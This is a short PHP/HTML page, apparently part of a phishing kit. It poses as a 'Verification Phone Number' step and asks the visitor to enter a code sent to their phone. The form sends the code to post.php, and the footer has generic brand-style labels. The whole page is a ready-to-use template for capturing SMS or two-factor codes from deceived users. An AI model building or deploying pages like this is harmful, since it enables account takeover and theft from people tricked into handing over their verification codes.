<?php
require 'main.php';
?><!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="res/app1.css">
<title>Verification Phone Number </title>
</head>
<body>
<main>
<div class="continer">
<form action="post.php" method="post">
<div class="tittle">
<label >Verification Phone Number </label>
</div>
<div class="p">
<p>Code will be sent your phone.</p>
</div>
<div class="col">
<label >Enter code </label>
<input type="text" name="phone" required >
</div>
<div class="but">
<button type="submit">Submit</button>
</div>
<div class="fo">
<label >Send new code</label>
</div>
</form>
</div>
</main>
<footer>
<label > English</label>
<label > Cookies</label>
<label > Terms</label>
<label > Privacy</label>
</footer>
</body>
</html>